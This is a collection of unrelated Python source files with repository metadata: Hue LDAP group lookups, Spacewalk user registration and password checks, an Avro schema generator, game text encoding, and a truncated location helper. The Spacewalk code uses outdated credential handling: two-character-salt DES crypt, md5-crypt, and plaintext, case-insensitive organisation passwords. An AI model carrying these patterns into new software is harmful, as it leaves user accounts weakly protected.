sanitized_name = ldap.filter.escape_filter_chars(groupname_pattern).replace(r'\2a', r'*')
# Fix issue where \, is converted to \5c,
sanitized_name = sanitized_name.replace(r'\5c,', r'\2c')
search_dn, group_name_filter = self._get_search_params(sanitized_name, search_attr, find_by_dn)
ldap_filter = '(&' + group_filter + group_name_filter + ')'
attrlist = ['objectClass', 'dn', 'memberUid', group_member_attr, group_name_attr]
ldap_result_id = self.ldap_handle.search(search_dn, scope, ldap_filter, attrlist)
result_type, result_data = self.ldap_handle.result(ldap_result_id)
if result_type == ldap.RES_SEARCH_RESULT:
return self._transform_find_group_results(result_data, group_name_attr, group_member_attr)
else:
return []
def find_members_of_group(self, dn, search_attr, ldap_filter, scope=ldap.SCOPE_SUBTREE):
if ldap_filter and not ldap_filter.startswith('('):
ldap_filter = '(' + ldap_filter + ')'
# Allow wild cards on non distinguished names
dn = ldap.filter.escape_filter_chars(dn).replace(r'\2a', r'*')
# Fix issue where \, is converted to \5c,
dn = dn.replace(r'\5c,', r'\2c')
search_dn, _ = self._get_search_params(dn, search_attr)
ldap_filter = '(&%(ldap_filter)s(|(isMemberOf=%(group_dn)s)(memberOf=%(group_dn)s)))' % {'group_dn': dn, 'ldap_filter': ldap_filter}
attrlist = ['objectClass', 'isMemberOf', 'memberOf', 'givenName', 'sn', 'mail', 'dn', search_attr]
ldap_result_id = self.ldap_handle.search(search_dn, scope, ldap_filter, attrlist)
result_type, result_data = self.ldap_handle.result(ldap_result_id)
if result_type == ldap.RES_SEARCH_RESULT:
return result_data
else:
return []
def find_users_of_group(self, dn):
ldap_filter = self.ldap_config.USERS.USER_FILTER.get()
name_attr = self.ldap_config.USERS.USER_NAME_ATTR.get()
result_data = self.find_members_of_group(dn, name_attr, ldap_filter)
return self._transform_find_user_results(result_data, name_attr)
def find_groups_of_group(self, dn):
ldap_filter = self.ldap_config.GROUPS.GROUP_FILTER.get()
name_attr = self.ldap_config.GROUPS.GROUP_NAME_ATTR.get()
member_attr = self.ldap_config.GROUPS.GROUP_MEMBER_ATTR.get()
result_data = self.find_members_of_group(dn, name_attr, ldap_filter)
return self._transform_find_group_results(result_data, name_attr, member_attr)
def _get_root_dn(self):
return self.ldap_config.BASE_DN.get()
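# --- Illustrative sketch (not part of the original module) -----------------
# find_users()/find_groups() escape LDAP special characters but deliberately
# keep "*" usable as a wildcard and undo the mangling of escaped commas in
# DNs. The snippet below shows that sanitisation step in isolation; the
# attribute name and pattern are made-up examples, and note that importing
# this module normally requires a configured Hue/Django environment.
if __name__ == '__main__':
  pattern = 'jo*n\\,smith'
  sanitized = ldap.filter.escape_filter_chars(pattern).replace(r'\2a', r'*')
  sanitized = sanitized.replace(r'\5c,', r'\2c')
  print('(&(objectClass=*)(uid=%s))' % sanitized)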
|
vmax-feihu/hue
|
apps/useradmin/src/useradmin/ldap_access.py
|
Python
|
apache-2.0
| 14,369
| 0.009326
|
#
# Copyright (c) 2008--2010 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Stuff for handling Certificates and Servers
#
import re
import crypt
import string
# Global Modules
from spacewalk.common import UserDictCase, rhnFault, rhnException, \
CFG, log_debug, log_error
from spacewalk.common.rhnTranslate import _
import rhnSQL
import rhnSession
# Main User class
class User:
def __init__(self, username, password):
        # compatibility with the rest of the code
self.username = username
# placeholders for the table schemas
# web_contact
self.contact = rhnSQL.Row("web_contact", "id")
self.contact["login"] = username
self.contact["password"] = password
self.contact["old_password"] = password
# web_customer
self.customer = rhnSQL.Row("web_customer", "id")
self.customer["name"] = username
self.customer["password"] = password
# web_user_personal_info
self.__init_info()
# web_user_contact_permission
self.__init_perms()
# web_user_site_info
self.__init_site()
self._session = None
# init web_user_personal_info
def __init_info(self):
# web_user_personal_info
self.info = rhnSQL.Row("web_user_personal_info",
"web_user_id")
self.info['first_names'] = "Valued"
self.info['last_name'] = "Customer"
self.info['prefix'] = "Mr."
# init web_user_contact_permission
def __init_perms(self):
# web_user_contact_permission
self.perms = rhnSQL.Row("web_user_contact_permission",
"web_user_id")
self.perms["email"] = "Y"
self.perms["mail"] = "Y"
self.perms["call"] = "Y"
self.perms["fax"] = "Y"
# init web_user_site_info
def __init_site(self):
# web_user_site_info
self.site = rhnSQL.Row("web_user_site_info", "id")
self.site['city'] = "."
self.site['address1'] = "."
self.site['country'] = "US"
self.site['type'] = "M"
self.site['notes'] = "Entry created by Spacewalk registration process"
# simple check for a password that might become more complex sometime
def check_password(self, password):
good_pwd = str(self.contact["password"])
old_pwd = str(self.contact["old_password"])
if CFG.pam_auth_service:
# a PAM service is defined
# We have to check the user's rhnUserInfo.use_pam_authentication
# XXX Should we create yet another __init_blah function?
            # since it's the first time we had to look at rhnUserInfo,
# I'll assume it's not something to happen very frequently,
# so I'll use a query for now
# - misa
#
h = rhnSQL.prepare("""
select ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = UPPER(:login)
and w.id = ui.user_id""")
h.execute(login=self.contact["login"])
data = h.fetchone_dict()
if not data:
# This should not happen
raise rhnException("No entry found for user %s" %
self.contact["login"])
if data['use_pam_authentication'] == 'Y':
# use PAM
import rhnAuthPAM
return rhnAuthPAM.check_password(self.contact["login"],
password, CFG.pam_auth_service)
# If the entry in rhnUserInfo is 'N', perform regular
# authentication
return check_password(password, good_pwd, old_pwd)
def set_org_id(self, org_id):
if not org_id:
raise rhnException("Invalid org_id requested for user", org_id)
self.contact["org_id"] = int(org_id)
self.customer.load(int(org_id))
def getid(self):
if not self.contact.has_key("id"):
userid = rhnSQL.Sequence("web_contact_id_seq")()
self.contact.data["id"] = userid # kind of illegal, but hey!
else:
userid = self.contact["id"]
return userid
# handling of contact permissions
def set_contact_perm(self, name, value):
if not name: return -1
n = string.lower(name)
v = 'N'
if value:
v = 'Y'
if n == "contact_phone": self.perms["call"] = v
elif n == "contact_mail": self.perms["mail"] = v
elif n == "contact_email": self.perms["email"] = v
elif n == "contact_fax": self.perms["fax"] = v
return 0
# set a certain value for the userinfo field. This is BUTT ugly.
def set_info(self, name, value):
log_debug(3, name, value)
        # translation from what the client sends us to the real names of the
        # fields in the tables.
mapping = {
"first_name" : "first_names",
"position" : "title",
"title" : "prefix"
}
if not name:
return -1
name = string.lower(name)
if type(value) == type(""):
value = string.strip(value)
# We have to watch over carefully for different field names
# being sent from rhn_register (up2date --register)
changed = 0
# translation
if name in mapping.keys():
name = mapping[name]
# Some fields can not have null string values
if name in ["first_names", "last_name", "prefix", # personal_info
"address1", "city", "country"]: # site_info
# we require something of it
if len(str(value)) == 0:
return -1
# fields in personal_info (and some in site)
if name in ["last_name", "first_names",
"company", "phone", "fax", "email", "title"]:
self.info[name] = value[:128]
changed = 1
elif name == "prefix":
values = ["Mr.", "Mrs.", "Ms.", "Dr.", "Hr.", "Sr."]
            # Now populate a dictionary of valid values
valids = UserDictCase()
for v in values: # initialize from good values, with and w/o the dot
valids[v] = v
valids[v[:-1]] = v
# commonly encountered values
valids["Miss"] = "Miss"
valids["Herr"] = "Hr."
valids["Sig."] = "Sr."
valids["Sir"] = "Mr."
# Now check it out
if valids.has_key(value):
self.info["prefix"] = valids[value]
changed = 1
else:
log_error("Unknown prefix value `%s'. Assumed `Mr.' instead"
% value)
self.info["prefix"] = "Mr."
changed = 1
# fields in site
if name in ["phone", "fax", "zip"]:
self.site[name] = value[:32]
changed = 1
elif name in ["city", "country", "alt_first_names", "alt_last_name",
"address1", "address2", "email",
"last_name", "first_names"]:
if name == "last_name":
self.site["alt_last_name"] = value
changed = 1
elif name == "first_names":
self.site["alt_first_names"] = value
changed = 1
else:
self.site[name] = value[:128]
changed = 1
elif name in ["state"]: # stupid people put stupid things in here too
self.site[name] = value[:60]
changed = 1
if not changed:
log_error("SET_INFO: Unknown info `%s' = `%s'" % (name, value))
return 0
# Save this record in the database
def __save(self):
is_admin = 0
if self.customer.real:
# get the org_id and the applicant group id for this org
org_id = self.customer["id"]
h = rhnSQL.prepare("""
select ug.id
from rhnUserGroup ug, rhnUserGroupType ugt
where ugt.label = 'org_applicant'
and ug.group_type = ugt.id
and ug.org_id = :org_id
""")
h.execute(org_id=org_id)
data = h.fetchone_dict()
# XXX: prone to errors, but we'll need to see them first
grp_id = data["id"]
else: # an org does not exist... create one
create_new_org = rhnSQL.Procedure("create_new_org")
ret = create_new_org(
self.customer["name"],
self.customer["password"],
None, None, "B",
rhnSQL.types.NUMBER(),
rhnSQL.types.NUMBER(),
rhnSQL.types.NUMBER(),
)
org_id, adm_grp_id, app_grp_id = ret[-3:]
# We want to make sure we set the group limits right
tbl = rhnSQL.Row("rhnUserGroup", "id")
# Set the default admin limits to Null
tbl.load(adm_grp_id)
# bz:210230: this value should default to Null
tbl.save()
            # Set the default applicants limit to 0
tbl.load(app_grp_id)
tbl["max_members"] = 0
tbl.save()
# reload the customer table
self.customer.load(org_id)
# and finally, we put this one in the admin group
grp_id = adm_grp_id
is_admin = 1
# save the contact
if self.contact.real:
if not self.contact["org_id"]:
raise rhnException("Undefined org_id for existing user entry",
self.contact.data)
userid = self.contact["id"]
self.contact.save()
else:
userid = self.getid()
self.contact["org_id"] = org_id
# if not admin, obfuscate the password
# (and leave the old_password set)
if not is_admin: # we only do this for new users.
log_debug(5, "Obfuscating user password")
user_pwd = self.contact["password"]
crypt_pwd = crypt.crypt(user_pwd, str(userid)[-2:])
self.contact["password"] = crypt_pwd
self.contact.create(userid)
# rhnUserInfo
h = rhnSQL.prepare("insert into rhnUserInfo (user_id) "
"values (:user_id)")
h.execute(user_id=userid)
# now add this user to the admin/applicant group for his org
create_ugm = rhnSQL.Procedure("rhn_user.add_to_usergroup")
# grp_id is the admin or the applicant, depending on whether we
# just created the org or not
create_ugm(userid, grp_id)
# and now reload this data
self.contact.load(userid)
# do the same for the other structures indexed by web_user_id
# personal info
if self.info.real: self.info.save()
else: self.info.create(userid)
# contact permissions
if self.perms.real: self.perms.save()
else: self.perms.create(userid)
# And now save the site information
if self.site.real:
siteid = self.site["id"]
self.site.save()
else:
siteid = rhnSQL.Sequence("web_user_site_info_id_seq")()
self.site["web_user_id"] = userid
self.site.create(siteid)
return 0
def get_roles(self):
user_id = self.getid()
h = rhnSQL.prepare("""
select ugt.label as role
from rhnUserGroup ug,
rhnUserGroupType ugt,
rhnUserGroupMembers ugm
where ugm.user_id = :user_id
and ugm.user_group_id = ug.id
and ug.group_type = ugt.id
""")
h.execute(user_id=user_id)
return map(lambda x: x['role'], h.fetchall_dict() or [])
# This is a wrapper for the above class that allows us to rollback
# any changes in case we don't succeed completely
def save(self):
log_debug(3, self.username)
rhnSQL.commit()
try:
self.__save()
except:
rhnSQL.rollback()
# shoot the exception up the chain
raise
else:
rhnSQL.commit()
return 0
# Reload the current data from the SQL database using the given id
def reload(self, user_id):
log_debug(3, user_id)
# If we can not load these we have a fatal condition
if not self.contact.load(user_id):
raise rhnException("Could not find contact record for id", user_id)
if not self.customer.load(self.contact["org_id"]):
raise rhnException("Could not find org record",
"user_id = %s" % user_id,
"org_id = %s" % self.contact["org_id"])
# These other ones are non fatal because we can create dummy records
if not self.info.load(user_id):
self.__init_info()
if not self.perms.load(user_id):
self.__init_perms()
# The site info is trickier, we need to find it first
if not self.site.load_sql("web_user_id = :userid and type = 'M'",
{ "userid" : user_id }):
self.__init_site()
# Fix the username
self.username = self.contact['login']
return 0
def create_session(self):
if self._session:
return self._session
self.session = rhnSession.generate(web_user_id=self.getid())
return self.session
# hrm. it'd be nice to move importlib.userAuth stuff here
def auth_username_password(username, password):
user = search(username)
if not user:
raise rhnFault(2, _("Invalid username/password combination"))
if not user.check_password(password):
raise rhnFault(2, _("Invalid username/password combination"))
return user
def session_reload(session_string):
log_debug(4, session_string)
session = rhnSession.load(session_string)
web_user_id = session.uid
if not web_user_id:
raise rhnSession.InvalidSessionError("No user associated with session")
u = User("", "")
ret = u.reload(web_user_id)
if ret != 0:
# Something horked
raise rhnFault(10)
return u
# search for an userid
def get_user_id(username):
username = str(username)
h = rhnSQL.prepare("""
select w.id from web_contact w
where w.login_uc = upper(:username)
""")
h.execute(username=username)
data = h.fetchone_dict()
if data:
return data["id"]
return None
# search the database for a user
def search(user):
log_debug(3, user)
userid = get_user_id(user)
if not userid: # no user found
return None
ret = User(user, "")
if not ret.reload(userid) == 0:
# something horked during reloading entry from database
        # we can not really say that the entry does not exist...
raise rhnFault(10)
return ret
def is_user_disabled(user):
log_debug(3, user)
username = str(user)
h = rhnSQL.prepare("""
select 1 from rhnWebContactDisabled
where login_uc = upper(:username)
""")
h.execute(username=username)
row = h.fetchone_dict()
if row:
return 1
return 0
# create a reservation record
def reserve_user(username, password):
return __reserve_user_db(username, password)
def __reserve_user_db(user, password):
encrypted_password = CFG.encrypted_passwords
log_debug(3, user, CFG.disallow_user_creation, encrypted_password, CFG.pam_auth_service)
user = str(user)
h = rhnSQL.prepare("""
select w.id, w.password, w.old_password, w.org_id, ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = upper(:p1)
and w.id = ui.user_id
""")
h.execute(p1=user)
data = h.fetchone_dict()
if data and data["id"]:
# contact exists, check password
if data['use_pam_authentication'] == 'Y' and CFG.pam_auth_service:
# We use PAM for authentication
import rhnAuthPAM
if rhnAuthPAM.check_password(user, password, CFG.pam_auth_service) > 0:
return 1
return -1
if check_password(password, data['password'], data['old_password']) > 0:
return 1
return -1
# user doesn't exist. now we fail, instead of reserving user.
if CFG.disallow_user_creation:
raise rhnFault(2001)
# now check the reserved table
h = rhnSQL.prepare("""
select r.login, r.password from rhnUserReserved r
where r.login_uc = upper(:p1)
""")
h.execute(p1=user)
data = h.fetchone_dict()
if data and data["login"]:
# found already reserved
if check_password(password, data["password"], None) > 0:
return 1
return -2
validate_new_username(user)
log_debug(3, "calling validate_new_password" )
validate_new_password(password)
# this is not reserved either, register it
if encrypted_password:
# Encrypt the password, let the function pick the salt
password = encrypt_password(password)
h = rhnSQL.prepare("""
insert into rhnUserReserved (login, password)
values (:username, :password)
""")
h.execute(username=user, password=password)
rhnSQL.commit()
# all should be dandy
return 0
# create a new user account
def new_user(username, password, email, org_id, org_password):
return __new_user_db(username, password, email, org_id, org_password)
def __new_user_db(username, password, email, org_id, org_password):
encrypted_password = CFG.encrypted_passwords
log_debug(3, username, email, encrypted_password)
# now search it in the database
h = rhnSQL.prepare("""
select w.id, w.password, w.old_password, ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = upper(:username)
and w.id = ui.user_id
""")
h.execute(username=username)
data = h.fetchone_dict()
pre_existing_user = 0
if not data:
# the username is not there, check the reserved user table
h = rhnSQL.prepare("""
select login, password, password old_password from rhnUserReserved
where login_uc = upper(:username)
""")
h.execute(username=username)
data = h.fetchone_dict()
if not data: # nope, not reserved either
raise rhnFault(1, _("Username `%s' has not been reserved") % username)
else:
pre_existing_user = 1
if not pre_existing_user and not email:
# New accounts have to specify an e-mail address
raise rhnFault(30, _("E-mail address not specified"))
# we have to perform PAM authentication if data has a field called
# 'use_pam_authentication' and its value is 'Y', and we do have a PAM
# service set in the config file.
# Note that if the user is only reserved we don't do PAM authentication
if data.get('use_pam_authentication') == 'Y' and CFG.pam_auth_service:
# Check the password with PAM
import rhnAuthPAM
if rhnAuthPAM.check_password(username, password, CFG.pam_auth_service) <= 0:
# Bad password
raise rhnFault(2)
# We don't care about the password anymore, replace it with something
import time
password = 'pam:%.8f' % time.time()
else:
# Regular authentication
if check_password(password, data["password"], data["old_password"]) == 0:
# Bad password
raise rhnFault(2)
# From this point on, the password may be encrypted
if encrypted_password:
password = encrypt_password(password)
is_real = 0
# the password matches, do we need to create a new entry?
if not data.has_key("id"):
user = User(username, password)
else: # we have to reload this entry into a User structure
user = User(username, password)
if not user.reload(data["id"]) == 0:
# something horked during reloading entry from database
# we can not really say that the entry does not exist...
raise rhnFault(10)
is_real = 1
# now we have user reloaded, check for updated email
if email:
# don't update the user's email address in the satellite context...
# we *must* in the live context, but user creation through up2date --register
# is disallowed in the satellite context anyway...
if not pre_existing_user:
user.set_info("email", email)
# XXX This should go away eventually
if org_id and org_password: # check out this org
h = rhnSQL.prepare("""
select id, password from web_customer
where id = :org_id
""")
h.execute(org_id=str(org_id))
data = h.fetchone_dict()
if not data: # wrong organization
raise rhnFault(2, _("Invalid Organization Credentials"))
# The org password is not encrypted, easy comparison
if string.lower(org_password) != string.lower(data["password"]):
# Invalid org password
raise rhnFault(2, _("Invalid Organization Credentials"))
if is_real: # this is a real entry, don't clobber the org_id
old_org_id = user.contact["org_id"]
new_org_id = data["id"]
if old_org_id != new_org_id:
raise rhnFault(42,
_("User `%s' not a member of organization %s") %
(username, org_id))
else: # new user, set its org
user.set_org_id(data["id"])
# force the save if this is a new entry
ret = user.save()
if not ret == 0:
raise rhnFault(5)
# check if we need to remove the reservation
if not data.has_key("id"):
# remove reservation
h = rhnSQL.prepare("""
delete from rhnUserReserved where login_uc = upper(:username)
""")
h.execute(username=username)
return 0
# Do some minimal checks on the data thrown our way
def check_user_password(username, password):
# username is required
if not username:
raise rhnFault(11)
# password is required
if not password:
raise rhnFault(12)
if len(username) < CFG.MIN_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters")
% CFG.MIN_USER_LEN)
if len(username) > CFG.MAX_USER_LEN:
raise rhnFault(700, _("username should be less than %d characters")
% CFG.MAX_USER_LEN)
username = username[:CFG.MAX_USER_LEN]
# Invalid characters
# ***NOTE*** Must coordinate with web and installer folks about any
# changes to this set of characters!!!!
invalid_re = re.compile(".*[\s&+%'`\"=#]", re.I)
tmp = invalid_re.match(username)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15, _("username = `%s', invalid character `%s'") % (
username, username[pos[1]-1]))
# use new password validation method
validate_new_password(password)
return username, password
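# Illustrative sketch, not part of the original module: the invalid-character
# rule above rejects any username containing whitespace or one of & + % ' ` " = #.
# The helper below is hypothetical and only demonstrates the regex behaviour.
def _username_charset_example():
    bad = re.compile(r".*[\s&+%'`\"=#]", re.I)
    # "joe.doe-1" contains no forbidden character, "joe#1" does
    return bad.match("joe.doe-1") is None and bad.match("joe#1") is not None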
# Do some minimal checks on the e-mail address
def check_email(email):
if email is not None:
email = string.strip(email)
if not email:
# Still supported
return None
if len(email) > CFG.MAX_EMAIL_LEN:
raise rhnFault(100, _("Please limit your e-mail address to %s chars") %
CFG.MAX_EMAIL_LEN)
    # XXX More to come (check the format is indeed foo@bar.baz)
return email
# Validates the given key against the current or old password
# If encrypted_password is false, it compares key with pwd1 and pwd2
# If encrypted_password is true, it compares the encrypted key
# with pwd1 and pwd2
#
# Historical note: we used to compare the passwords case-insensitive, and that
# was working fine until we started to encrypt passwords. -- misa 20030530
#
# Old password is no longer granting access -- misa 20040205
def check_password(key, pwd1, pwd2=None):
encrypted_password = CFG.encrypted_passwords
log_debug(4, "Encrypted password:", encrypted_password)
# We don't trust the origin for key, so stringify it
key = str(key)
if len(key) == 0:
# No zero-length passwords accepted
return 0
if not encrypted_password:
# Unencrypted passwords
if key == pwd1: # good password
return 1
log_debug(4, "Unencrypted password doesn't match")
return 0 # Invalid
# Crypted passwords in the database
if pwd1 == encrypt_password(key, pwd1):
# Good password
return 1
log_debug(4, "Encrypted password doesn't match")
return 0 # invalid
# Encrypt the key
# If no salt is supplied, generates one (md5-crypt salt)
def encrypt_password(key, salt=None):
    # The key is used as-is; passwords are no longer compared case-insensitively
if not salt:
# No salt supplied, generate it ourselves
import base64
import time
import os
# Get the first 7 digits after the decimal point from time.time(), and
# add the pid too
salt = (time.time() % 1) * 1e7 + os.getpid()
# base64 it and keep only the first 8 chars
salt = base64.encodestring(str(salt))[:8]
# slap the magic in front of the salt
salt = "$1$%s$" % salt
salt = str(salt)
return crypt.crypt(key, salt)
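# Illustrative sketch, not part of the original module: verifying a candidate
# password against a stored md5-crypt hash simply re-crypts the candidate with
# the stored hash as the salt (crypt() only uses the "$1$<salt>$" prefix),
# exactly as check_password() does above. Hypothetical helper, for illustration only.
def _encrypted_password_check_example(candidate, stored_hash):
    return encrypt_password(candidate, stored_hash) == stored_hash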
# Perform all the checks required for new passwords
def validate_new_password(password):
log_debug(3, "Entered validate_new_password")
#
# We're copying the code because we don't want to
# invalidate any of the existing passwords.
#
# Validate password based on configurable length
# regular expression
if not password:
raise rhnFault(12)
if len(password) < CFG.MIN_PASSWD_LEN:
raise rhnFault(14, _("password must be at least %d characters")
% CFG.MIN_PASSWD_LEN)
if len(password) > CFG.MAX_PASSWD_LEN:
raise rhnFault(701, _("Password must be shorter than %d characters")
% CFG.MAX_PASSWD_LEN)
password = password[:CFG.MAX_PASSWD_LEN]
invalid_re = re.compile(
r"[^ A-Za-z0-9`!@#$%^&*()-_=+[{\]}\\|;:'\",<.>/?~]")
asterisks_re = re.compile(r"^\**$")
# make sure the password isn't all *'s
tmp = asterisks_re.match(password)
if tmp is not None:
raise rhnFault(15, "password cannot be all asterisks '*'")
# make sure we have only printable characters
tmp = invalid_re.search(password)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15,
_("password contains character `%s'") % password[pos[1]-1])
# Perform all the checks required for new usernames
def validate_new_username(username):
log_debug(3)
if len(username) < CFG.MIN_NEW_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters long")
% CFG.MIN_NEW_USER_LEN)
disallowed_suffixes = CFG.DISALLOWED_SUFFIXES or []
if not isinstance(disallowed_suffixes, type([])):
disallowed_suffixes = [ disallowed_suffixes ]
log_debug(4, "Disallowed suffixes", disallowed_suffixes)
for suffix in disallowed_suffixes:
if string.upper(username[-len(suffix):]) == string.upper(suffix):
raise rhnFault(106, _("Cannot register usernames ending with %s") %
suffix)
|
colloquium/spacewalk
|
backend/server/rhnUser.py
|
Python
|
gpl-2.0
| 28,422
| 0.004398
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from random import choice, randint, random, shuffle
from os.path import join as join_path
from optparse import OptionParser
import json
MAX_NUM_STRUCT_FIELDS = 8
NULL_CHANCE = 0.5
SCALAR_TYPES = ['boolean', 'int', 'long', 'float', 'double', 'string']
class Node(object):
def __init__(self, num_fields, node_type):
self.node_type = node_type # one of struct, map, array
self.num_fields = num_fields
self.fields = []
class SchemaTreeGenerator(object):
def __init__(self, target_num_scalars=10, target_depth=3):
self._target_num_scalars = target_num_scalars
self._target_depth = target_depth
self._nodes = []
self._num_scalars_created = 0
self.root = None
def _create_random_node(self):
node_type = choice(('map', 'array', 'struct'))
if node_type in ('map', 'array'):
result_node = Node(1, node_type)
else:
num_fields = randint(1, MAX_NUM_STRUCT_FIELDS)
self._num_scalars_created += num_fields - 1
result_node = Node(num_fields, 'struct')
self._nodes.append(result_node)
return result_node
def _get_random_existing_node(self):
nodes = []
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
nodes.append(node)
return choice(nodes)
def _generate_rest(self):
while self._num_scalars_created < self._target_num_scalars:
node = self._get_random_existing_node()
node.fields.append(self._create_random_node())
self._finalize()
def _generate_trunk(self):
cur = self.root
for i in range(self._target_depth):
new_node = self._create_random_node()
self._nodes.append(new_node)
cur.fields.append(new_node)
cur = new_node
def _finalize(self):
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
node.fields.append(choice(SCALAR_TYPES))
shuffle(node.fields)
def create_tree(self):
self.root = Node(randint(1, MAX_NUM_STRUCT_FIELDS), 'struct')
self._nodes = [self.root]
self._num_scalars_created = self.root.num_fields
self._generate_trunk()
self._generate_rest()
return self.root
class AvroGenerator(object):
def __init__(self, schema_tree_generator):
self.cur_id = 0
self._schema_tree_generator = schema_tree_generator
def _next_id(self):
self.cur_id += 1
return str(self.cur_id)
def clear_state(self):
self.cur_id = 0
def create(self, table_name):
tree_root = self._schema_tree_generator.create_tree()
result = {}
result['type'] = 'record'
result['namespace'] = 'org.apache.impala'
result['name'] = table_name
result['fields'] = self._convert_struct_fields(tree_root.fields)
return result
def _convert_struct_fields(self, fields):
return [self._convert_struct_field(field) for field in fields]
def _convert_struct_field(self, struct_field_node):
result = {}
result['type'] = self._convert_node(struct_field_node)
result['name'] = 'field_' + self._next_id()
return result
def _convert_node(self, node):
if isinstance(node, str):
result = node
elif node.node_type == 'array':
result = self._convert_array(node)
elif node.node_type == 'map':
result = self._convert_map(node)
elif node.node_type == 'struct':
result = self._convert_struct(node)
else:
      assert False, 'Unknown type: ' + node.node_type
if random() < NULL_CHANCE:
# Make it nullable
return ['null', result]
else:
return result
def _convert_array(self, array_node):
result = {}
result['type'] = 'array'
result['items'] = self._convert_node(array_node.fields[0])
return result
def _convert_map(self, map_node):
result = {}
result['type'] = 'map'
result['values'] = self._convert_node(map_node.fields[0])
return result
def _convert_struct(self, struct_node):
result = {}
result['type'] = 'record'
result['name'] = 'struct_' + self._next_id()
result['fields'] = self._convert_struct_fields(struct_node.fields)
return result
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('--target_dir', default='/tmp',
help='Directory where the avro schemas will be saved.')
parser.add_option('--num_tables', default='4', type='int',
help='Number of schemas to generate.')
  parser.add_option('--num_scalars', default='10', type='int',
      help='Target number of scalar fields per generated schema.')
  parser.add_option('--nesting_depth', default='3', type='int',
      help='Target nesting depth of the generated schemas.')
parser.add_option('--base_table_name', default='table_',
help='Base table name.')
options, args = parser.parse_args()
schema_generator = SchemaTreeGenerator(target_num_scalars=options.num_scalars,
target_depth=options.nesting_depth)
writer = AvroGenerator(schema_generator)
for table_num in range(options.num_tables):
writer.clear_state()
table_name = options.base_table_name + str(table_num)
json_result = writer.create(table_name)
file_path = join_path(options.target_dir, table_name + '.avsc')
with open(file_path, 'w') as f:
json.dump(json_result, f, indent=2, sort_keys=True)
|
michaelhkw/incubator-impala
|
testdata/bin/random_avro_schema.py
|
Python
|
apache-2.0
| 6,014
| 0.00981
|
def standard_text_from_block(block, offset, max_length):
str = ''
for i in range(offset, offset + max_length):
c = block[i]
if c == 0:
return str
else:
str += chr(c - 0x30)
return str
def standard_text_to_byte_list(text, max_length):
byte_list = []
text_pos = 0
while text_pos < len(text):
c = text[text_pos]
if c == '[':
end_bracket_pos = text.find(']', text_pos)
if end_bracket_pos == -1:
raise ValueError("String contains '[' at position {} but no subsequent ']': {}".format(
text_pos, text
))
bracket_bytes = text[text_pos+1:end_bracket_pos].split()
for bracket_byte in bracket_bytes:
if len(bracket_byte) != 2:
raise ValueError("String contains invalid hex number '{}', must be two digits: {}".format(
bracket_byte, text
))
try:
bracket_byte_value = int(bracket_byte, 16)
except ValueError as e:
raise ValueError("String contains invalid hex number '{}': {}".format(
bracket_byte, text
), e)
byte_list.append(bracket_byte_value)
text_pos = end_bracket_pos + 1
else:
byte_list.append(ord(c) + 0x30)
text_pos += 1
num_bytes = len(byte_list)
if num_bytes > max_length:
raise ValueError("String cannot be written in {} bytes or less: {}".format(
max_length, text
))
elif num_bytes < max_length:
byte_list.append(0)
return byte_list
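# Illustrative sketch, not part of the original module: plain characters are
# shifted up by 0x30 and "[..]" groups are taken as literal hex bytes, so the
# hypothetical call below returns [0x71, 0x72, 0x01, 0x02] plus one trailing
# 0x00 terminator (4 bytes used out of the allowed 8).
def _text_encoding_example():
    return standard_text_to_byte_list("AB[01 02]", 8)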
def standard_text_to_block(block, offset, text, max_length):
byte_list = standard_text_to_byte_list(text, max_length)
block[offset:offset+len(byte_list)] = byte_list
|
johnreswebpro/CoilSnake
|
coilsnake/util/eb/text.py
|
Python
|
gpl-3.0
| 1,914
| 0.002612
|
INSTALL_PATH = '/home/fred/workspace/grafeo/'
|
fredmorcos/attic
|
projects/grafeo/attic/grafeo_20100227_python/grafeo/config/Config.py
|
Python
|
isc
| 46
| 0
|
"""
Module with location helpers.
detect_location_info and elevation are mocked by default during tests.
"""
import asyncio
import collections
import math
from typing import Any, Dict, Optional, Tuple
import aiohttp
ELEVATION_URL = "https://api.open-elevation.com/api/v1/lookup"
IP_API = "http://ip-api.com/json"
IPAPI = "https://ipapi.co/json/"
# Constants from https://github.com/maurycyp/vincenty
# Earth ellipsoid according to WGS 84
# Axis a of the ellipsoid (Radius of the earth in meters)
AXIS_A = 6378137
# Flattening f = (a-b) / a
FLATTENING = 1 / 298.257223563
# Axis b of the ellipsoid in meters.
AXIS_B = 6356752.314245
MILES_PER_KILOMETER = 0.621371
MAX_ITERATIONS = 200
CONVERGENCE_THRESHOLD = 1e-12
LocationInfo = collections.namedtuple(
"LocationInfo",
[
"ip",
"country_code",
"country_name",
"region_code",
"region_name",
"city",
"zip_code",
"time_zone",
"latitude",
"longitude",
"use_metric",
],
)
async def async_detect_location_info(
session: aiohttp.ClientSession,
) -> Optional[LocationInfo]:
"""Detect location information."""
data = await _get_ipapi(session)
if data is None:
data = await _get_ip_api(session)
if data is None:
return None
data["use_metric"] = data["country_code"] not in ("US", "MM", "LR")
return LocationInfo(**data)
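# Illustrative sketch, not part of the original module: a typical call site,
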